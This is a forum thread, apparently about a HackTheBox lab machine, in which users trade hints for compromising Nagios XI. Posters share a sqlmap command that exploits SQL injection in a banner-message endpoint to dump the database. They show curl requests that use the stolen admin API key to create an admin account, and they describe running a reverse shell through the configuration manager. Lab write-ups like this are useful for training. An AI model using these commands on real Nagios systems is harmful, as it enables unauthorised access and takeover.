[jyosun]

get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

how can i add new user? should i use curl?

[godzilla]

get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

curl -k -X POST -H "Authorization: Bearer IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" -H "Content-Type: application/json" -d '{"username": "test", "abcd": "abcd"}' https://nagios.monitored.htb/nagiosxi/api/v1/users
{"error":"No API Key provided"}

but not working

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | Contact us via https://breachforums.rs/misc.php?action=help&hid=27 if you feel this is incorrect.

[jyosun]

get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

curl -k -X POST -H "Authorization: Bearer IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" -H "Content-Type: application/json" -d '{"username": "test", "abcd": "abcd"}' https://nagios.monitored.htb/nagiosxi/api/v1/users
{"error":"No API Key provided"}

but not working

i added the new user with this command

curl -XPOST --insecure "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=myadmin&password=myadmin&name=myadmin&email=myadmin@LocalHost&auth_level=admin"

[wardensec]

get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, how do you add them as admins? I've tried a few parameter with no luck

[ohmical]

get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, how do you add them as admins? I've tried a few parameter with no luck

add admin user like this

curl -X POST "http://{IP}/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=test&password=test&name=test&email=test@LocalHost&auth_level=admin"

[jyosun]

I got a admin user, but how can i add a revshell?

[St4rry]

get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, how do you add them as admins? I've tried a few parameter with no luck

add admin user like this

curl -X POST "http://{IP}/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=test&password=test&name=test&email=test@LocalHost&auth_level=admin"

how to get apikey?thank u

[peRd1]

I got a admin user, but how can i add a revshell?

Well login to the Nagios, use its interface? What about configuration menu point, if you're an admin user, you can access this.

Config manager, add new command and run it...

---

how to get apikey?thank u

That's what you get from the SQLi. You will get the API key. No need to crack the blowfish hashes you won't get any result either.

With that api key you will add new user (google this, there's an exact command) on nagios forum. Don't forget to create admin elevated user if you're creating, right? Otherwise what's the point...

And with that newly generated user login to the nagiosxi webui and use it, add new command such as a revshell and run it...

[b1ack_c0de]

glhf

sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --dump

How did you find this endpoint 

https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=

[St4rry]

I got a admin user, but how can i add a revshell?

Well login to the Nagios, use its interface? What about configuration menu point, if you're an admin user, you can access this.

Config manager, add new command and run it...

---

how to get apikey?thank u

That's what you get from the SQLi. You will get the API key. No need to crack the blowfish hashes you won't get any result either.

With that api key you will add new user (google this, there's an exact command) on nagios forum. Don't forget to create admin elevated user if you're creating, right? Otherwise what's the point...

And with that newly generated user login to the nagiosxi webui and use it, add new command such as a revshell and run it...

Thank u.I am so stupid